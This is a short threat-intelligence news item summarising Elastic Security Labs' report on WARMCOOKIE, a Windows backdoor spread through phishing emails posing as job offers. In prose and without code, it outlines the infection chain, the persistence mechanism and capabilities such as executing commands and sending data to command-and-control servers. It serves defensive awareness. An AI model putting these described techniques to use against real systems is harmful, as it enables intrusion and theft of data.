2024-06-20

WARMCOOKIE Malware Lands on Windows Systems Through Job-Themed Phishing Emails

Level: 
Tactical
  |  Source: 
Elastic
Global
Share:

WARMCOOKIE Malware Lands on Windows Systems Through Job-Themed Phishing Emails

Windows malware known as 'Warmcookie' is being distributed through phishing emails disguised as job opportunities and recruitment offers. Researchers at Elastic Security Labs have reported on the malware, observing its distribution since late April. This malware is analyzed as an initial backdoor to infiltrate networks and deploy secondary payloads with capabilities to capture fingerprints of the infected machine, take screenshots, execute commands, and covertly communicate with the attacker's infrastructure. Each instance of WARMCOOKIE is configured with a specific command and control (C2) IP address and an RC4 key, indicating a personalized attack strategy against each victim. The targeted nature of the campaign is evident in the phishing emails, as Elastic reports, "These emails targeted individuals by their names and their current employer, enticing victims to pursue new job opportunities by clicking a link to an internal system to view a job description."

Victims falling for the ruse initiate an attack sequence that begins with downloading a JavaScript (.js) file from a phishing site. This triggers a PowerShell script that uses the Background Intelligent Transfer Service (BITS) to fetch and execute the WARMCOOKIE DLL via the 'Start' export. Once executed, WARMCOOKIE establishes persistence in the victim's system by setting up a scheduled task executed via rundll32, ensuring it remains active regardless of system reboots or user detection. This persistent foothold is "scheduled to run every 10 minutes every day," allowing the malware to maintain long-term access to compromised systems covertly.

WARMCOOKIE’s operational framework involves dynamic API loading and custom obfuscation techniques to evade detection. The malware communicates with its command and control (C2) server using encrypted channels. Its capabilities include executing commands directly on the infected host with cmd /c, querying system information such as IP address, CPU details, registry for installed programs, and capturing sensitive data, all of which is communicated back to the C2 infrastructure. Elastic Security Labs evaluates the malware as a rising threat in the cybersecurity landscape, stating that it poses a "formidable threat that provides the capability to access target environments and push additional types of malware down to victims. While there is room for improvement on the malware development side, we believe these minor issues will be addressed over time."

Get trending threats published weekly by the Anvilogic team.

Sign Up Now